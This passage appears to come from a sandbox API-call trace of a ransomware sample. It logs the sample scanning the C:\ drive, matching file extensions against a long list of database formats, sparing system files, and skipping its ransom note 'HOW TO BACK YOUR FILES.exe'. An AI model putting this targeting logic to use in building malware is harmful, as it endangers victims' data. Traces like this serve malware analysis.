returned 1 [0039.566] lstrlenW (lpString="kdb") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="kdb") returned 1 [0039.566] lstrlenW (lpString="kexi") returned 4 [0039.566] lstrcmpiW (lpString1=".sys", lpString2="kexi") returned -1 [0039.566] lstrlenW (lpString="kexic") returned 5 [0039.566] lstrcmpiW (lpString1="l.sys", lpString2="kexic") returned 1 [0039.566] lstrlenW (lpString="kexis") returned 5 [0039.566] lstrcmpiW (lpString1="l.sys", lpString2="kexis") returned 1 [0039.566] lstrlenW (lpString="lgc") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="lgc") returned 1 [0039.566] lstrlenW (lpString="lwx") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="lwx") returned 1 [0039.566] lstrlenW (lpString="maf") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="maf") returned 1 [0039.566] lstrlenW (lpString="maq") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="maq") returned 1 [0039.567] lstrlenW (lpString="mar") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mar") returned 1 [0039.567] lstrlenW (lpString="marshal") returned 7 [0039.567] lstrcmpiW (lpString1="fil.sys", lpString2="marshal") returned -1 [0039.567] lstrlenW (lpString="mas") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mas") returned 1 [0039.567] lstrlenW (lpString="mav") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mav") returned 1 [0039.567] lstrlenW (lpString="maw") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="maw") returned 1 [0039.567] lstrlenW (lpString="mdbhtml") returned 7 [0039.567] lstrcmpiW (lpString1="fil.sys", lpString2="mdbhtml") returned -1 [0039.567] lstrlenW (lpString="mdn") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mdn") returned 1 [0039.567] lstrlenW (lpString="mdt") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mdt") returned 1 [0039.567] lstrlenW (lpString="mfd") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mfd") returned 1 [0039.567] lstrlenW (lpString="mpd") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mpd") returned 1 [0039.567] lstrlenW (lpString="mrg") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mrg") returned 1 [0039.567] lstrlenW (lpString="mud") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mud") returned 1 [0039.567] lstrlenW (lpString="mwb") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="mwb") returned 1 [0039.567] lstrlenW (lpString="myd") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="myd") returned 1 [0039.567] lstrlenW (lpString="ndf") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="ndf") returned 1 [0039.567] lstrlenW (lpString="nnt") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="nnt") returned 1 [0039.567] lstrlenW (lpString="nrmlib") returned 6 [0039.567] lstrcmpiW (lpString1="il.sys", lpString2="nrmlib") returned -1 [0039.567] lstrlenW (lpString="ns2") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="ns2") returned 1 [0039.567] lstrlenW (lpString="ns3") returned 3 [0039.567] lstrcmpiW (lpString1="sys", lpString2="ns3") returned 1 [0039.568] lstrlenW (lpString="ns4") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="ns4") returned 1 [0039.568] lstrlenW (lpString="nsf") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="nsf") returned 1 [0039.568] lstrlenW (lpString="nv") returned 2 [0039.568] lstrcmpiW (lpString1="ys", lpString2="nv") returned 1 [0039.568] lstrlenW (lpString="nv2") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="nv2") returned 1 [0039.568] lstrlenW (lpString="nwdb") returned 4 [0039.568] lstrcmpiW (lpString1=".sys", lpString2="nwdb") returned -1 [0039.568] lstrlenW (lpString="nyf") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="nyf") returned 1 [0039.568] lstrlenW (lpString="odb") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="odb") returned 1 [0039.568] lstrlenW (lpString="odb") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="odb") returned 1 [0039.568] lstrlenW (lpString="oqy") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="oqy") returned 1 [0039.568] lstrlenW (lpString="ora") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="ora") returned 1 [0039.568] lstrlenW (lpString="orx") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="orx") returned 1 [0039.568] lstrlenW (lpString="owc") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="owc") returned 1 [0039.568] lstrlenW (lpString="p96") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="p96") returned 1 [0039.568] lstrlenW (lpString="p97") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="p97") returned 1 [0039.568] lstrlenW (lpString="pan") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="pan") returned 1 [0039.568] lstrlenW (lpString="pdb") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="pdb") returned 1 [0039.568] lstrlenW (lpString="pdm") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="pdm") returned 1 [0039.568] lstrlenW (lpString="pnz") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="pnz") returned 1 [0039.568] lstrlenW (lpString="qry") returned 3 [0039.568] lstrcmpiW (lpString1="sys", lpString2="qry") returned 1 [0039.568] lstrlenW (lpString="qvd") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="qvd") returned 1 [0039.569] lstrlenW (lpString="rbf") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="rbf") returned 1 [0039.569] lstrlenW (lpString="rctd") returned 4 [0039.569] lstrcmpiW (lpString1=".sys", lpString2="rctd") returned -1 [0039.569] lstrlenW (lpString="rod") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="rod") returned 1 [0039.569] lstrlenW (lpString="rodx") returned 4 [0039.569] lstrcmpiW (lpString1=".sys", lpString2="rodx") returned -1 [0039.569] lstrlenW (lpString="rpd") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="rpd") returned 1 [0039.569] lstrlenW (lpString="rsd") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="rsd") returned 1 [0039.569] lstrlenW (lpString="sas7bdat") returned 8 [0039.569] lstrcmpiW (lpString1="rfil.sys", lpString2="sas7bdat") returned -1 [0039.569] lstrlenW (lpString="sbf") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="sbf") returned 1 [0039.569] lstrlenW (lpString="scx") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="scx") returned 1 [0039.569] lstrlenW (lpString="sdb") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="sdb") returned 1 [0039.569] lstrlenW (lpString="sdc") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="sdc") returned 1 [0039.569] lstrlenW (lpString="sdf") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="sdf") returned 1 [0039.569] lstrlenW (lpString="sis") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="sis") returned 1 [0039.569] lstrlenW (lpString="spq") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="spq") returned 1 [0039.569] lstrlenW (lpString="te") returned 2 [0039.569] lstrcmpiW (lpString1="ys", lpString2="te") returned 1 [0039.569] lstrlenW (lpString="teacher") returned 7 [0039.569] lstrcmpiW (lpString1="fil.sys", lpString2="teacher") returned -1 [0039.569] lstrlenW (lpString="tmd") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="tmd") returned -1 [0039.569] lstrlenW (lpString="tps") returned 3 [0039.569] lstrcmpiW (lpString1="sys", lpString2="tps") returned -1 [0039.569] lstrlenW (lpString="trc") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="trc") returned -1 [0039.570] lstrlenW (lpString="trc") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="trc") returned -1 [0039.570] lstrlenW (lpString="trm") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="trm") returned -1 [0039.570] lstrlenW (lpString="udb") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="udb") returned -1 [0039.570] lstrlenW (lpString="udl") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="udl") returned -1 [0039.570] lstrlenW (lpString="usr") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="usr") returned -1 [0039.570] lstrlenW (lpString="v12") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="v12") returned -1 [0039.570] lstrlenW (lpString="vis") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="vis") returned -1 [0039.570] lstrlenW (lpString="vpd") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="vpd") returned -1 [0039.570] lstrlenW (lpString="vvv") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="vvv") returned -1 [0039.570] lstrlenW (lpString="wdb") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="wdb") returned -1 [0039.570] lstrlenW (lpString="wmdb") returned 4 [0039.570] lstrcmpiW (lpString1=".sys", lpString2="wmdb") returned -1 [0039.570] lstrlenW (lpString="wrk") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="wrk") returned -1 [0039.570] lstrlenW (lpString="xdb") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="xdb") returned -1 [0039.570] lstrlenW (lpString="xld") returned 3 [0039.570] lstrcmpiW (lpString1="sys", lpString2="xld") returned -1 [0039.570] lstrlenW (lpString="xmlff") returned 5 [0039.570] lstrcmpiW (lpString1="l.sys", lpString2="xmlff") returned -1 [0039.570] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x492bbea0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x492bbea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.570] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.570] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0039.570] lstrcmpiW (lpString1="MSOCache", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.570] lstrcmpiW (lpString1="MSOCache", lpString2="aoldtz.exe") returned 1 [0039.570] lstrcmpiW (lpString1="MSOCache", lpString2=".") returned 1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="..") returned 1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="windows") returned -1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="bootmgr") returned 1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="temp") returned -1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="pagefile.sys") returned -1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="boot") returned 1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="ids.txt") returned 1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="ntuser.dat") returned -1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="perflogs") returned -1 [0039.571] lstrcmpiW (lpString1="MSOCache", lpString2="MSBuild") returned 1 [0039.571] lstrlenW (lpString="MSOCache") returned 8 [0039.571] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0039.571] lstrcpyW (in: lpString1=0x2e2e866, lpString2="MSOCache" | out: lpString1="MSOCache") returned="MSOCache" [0039.571] SetFileAttributesW (lpFileName="C:\\MSOCache", dwFileAttributes=0x2012) returned 1 [0039.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0039.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2e7a48 [0039.571] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7a30 | out: ListHead=0x2e77d0, ListEntry=0x2e7a30) returned 0x2e7a10 [0039.571] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0039.571] lstrcmpiW (lpString1="pagefile.sys", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.571] lstrcmpiW (lpString1="pagefile.sys", lpString2="aoldtz.exe") returned 1 [0039.571] lstrcmpiW (lpString1="pagefile.sys", lpString2=".") returned 1 [0039.571] lstrcmpiW (lpString1="pagefile.sys", lpString2="..") returned 1 [0039.571] lstrcmpiW (lpString1="pagefile.sys", lpString2="windows") returned -1 [0039.571] lstrcmpiW (lpString1="pagefile.sys", lpString2="bootmgr") returned 1 [0039.572] lstrcmpiW (lpString1="pagefile.sys", lpString2="temp") returned -1 [0039.572] lstrcmpiW (lpString1="pagefile.sys", lpString2="pagefile.sys") returned 0 [0039.572] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="aoldtz.exe") returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2=".") returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="..") returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="windows") returned -1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="bootmgr") returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="temp") returned -1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="pagefile.sys") returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="boot") returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="ids.txt") returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="ntuser.dat") returned 1 [0039.572] lstrcmpiW (lpString1="PerfLogs", lpString2="perflogs") returned 0 [0039.572] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3e8ffc40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3e8ffc40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="aoldtz.exe") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2=".") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="..") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="windows") returned -1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="bootmgr") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="temp") returned -1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="pagefile.sys") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="boot") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="ids.txt") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="ntuser.dat") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="perflogs") returned 1 [0039.572] lstrcmpiW (lpString1="Program Files", lpString2="MSBuild") returned 1 [0039.572] lstrlenW (lpString="Program Files") returned 13 [0039.572] lstrlenW (lpString="C:\\MSOCache") returned 11 [0039.572] lstrcpyW (in: lpString1=0x2e2e866, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0039.572] SetFileAttributesW (lpFileName="C:\\Program Files", dwFileAttributes=0x10) returned 1 [0039.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0039.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2ef8c0 [0039.573] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7a70 | out: ListHead=0x2e77d0, ListEntry=0x2e7a70) returned 0x2e7a30 [0039.573] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="aoldtz.exe") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="windows") returned -1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="bootmgr") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="temp") returned -1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="pagefile.sys") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="boot") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="ids.txt") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="ntuser.dat") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="perflogs") returned 1 [0039.573] lstrcmpiW (lpString1="Program Files (x86)", lpString2="MSBuild") returned 1 [0039.573] lstrlenW (lpString="Program Files (x86)") returned 19 [0039.573] lstrlenW (lpString="C:\\Program Files") returned 16 [0039.573] lstrcpyW (in: lpString1=0x2e2e866, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0039.573] SetFileAttributesW (lpFileName="C:\\Program Files (x86)", dwFileAttributes=0x10) returned 1 [0039.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0039.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2e) returned 0x2ecfe8 [0039.573] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7a90 | out: ListHead=0x2e77d0, ListEntry=0x2e7a90) returned 0x2e7a70 [0039.573] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x454b2140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x454b2140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0039.573] lstrcmpiW (lpString1="ProgramData", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.573] lstrcmpiW (lpString1="ProgramData", lpString2="aoldtz.exe") returned 1 [0039.573] lstrcmpiW (lpString1="ProgramData", lpString2=".") returned 1 [0039.573] lstrcmpiW (lpString1="ProgramData", lpString2="..") returned 1 [0039.573] lstrcmpiW (lpString1="ProgramData", lpString2="windows") returned -1 [0039.573] lstrcmpiW (lpString1="ProgramData", lpString2="bootmgr") returned 1 [0039.574] lstrcmpiW (lpString1="ProgramData", lpString2="temp") returned -1 [0039.574] lstrcmpiW (lpString1="ProgramData", lpString2="pagefile.sys") returned 1 [0039.574] lstrcmpiW (lpString1="ProgramData", lpString2="boot") returned 1 [0039.574] lstrcmpiW (lpString1="ProgramData", lpString2="ids.txt") returned 1 [0039.574] lstrcmpiW (lpString1="ProgramData", lpString2="ntuser.dat") returned 1 [0039.574] lstrcmpiW (lpString1="ProgramData", lpString2="perflogs") returned 1 [0039.574] lstrcmpiW (lpString1="ProgramData", lpString2="MSBuild") returned 1 [0039.574] lstrlenW (lpString="ProgramData") returned 11 [0039.574] lstrlenW (lpString="C:\\Program Files (x86)") returned 22 [0039.574] lstrcpyW (in: lpString1=0x2e2e866, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0039.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0039.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2c9460 [0039.574] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7ab0 | out: ListHead=0x2e77d0, ListEntry=0x2e7ab0) returned 0x2e7a90 [0039.574] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="aoldtz.exe") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2=".") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="..") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="windows") returned -1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="bootmgr") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="temp") returned -1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="pagefile.sys") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="boot") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="ids.txt") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="ntuser.dat") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="perflogs") returned 1 [0039.574] lstrcmpiW (lpString1="Recovery", lpString2="MSBuild") returned 1 [0039.574] lstrlenW (lpString="Recovery") returned 8 [0039.574] lstrlenW (lpString="C:\\ProgramData") returned 14 [0039.574] lstrcpyW (in: lpString1=0x2e2e866, lpString2="Recovery" | out: lpString1="Recovery") returned="Recovery" [0039.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0039.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2e7ae8 [0039.574] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7ad0 | out: ListHead=0x2e77d0, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0039.574] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0039.574] lstrcmpiW (lpString1="System Volume Information", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="aoldtz.exe") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2=".") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="..") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="windows") returned -1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="bootmgr") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="temp") returned -1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="pagefile.sys") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="boot") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="ids.txt") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="ntuser.dat") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="perflogs") returned 1 [0039.575] lstrcmpiW (lpString1="System Volume Information", lpString2="MSBuild") returned 1 [0039.575] lstrlenW (lpString="System Volume Information") returned 25 [0039.575] lstrlenW (lpString="C:\\Recovery") returned 11 [0039.575] lstrcpyW (in: lpString1=0x2e2e866, lpString2="System Volume Information" | out: lpString1="System Volume Information") returned="System Volume Information" [0039.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0039.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3a) returned 0x2e5fb8 [0039.575] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b10 | out: ListHead=0x2e77d0, ListEntry=0x2e7b10) returned 0x2e7ad0 [0039.575] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="aoldtz.exe") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2=".") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="..") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="windows") returned -1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="bootmgr") returned 1 [0039.575] lstrcmpiW (lpString1="Users", 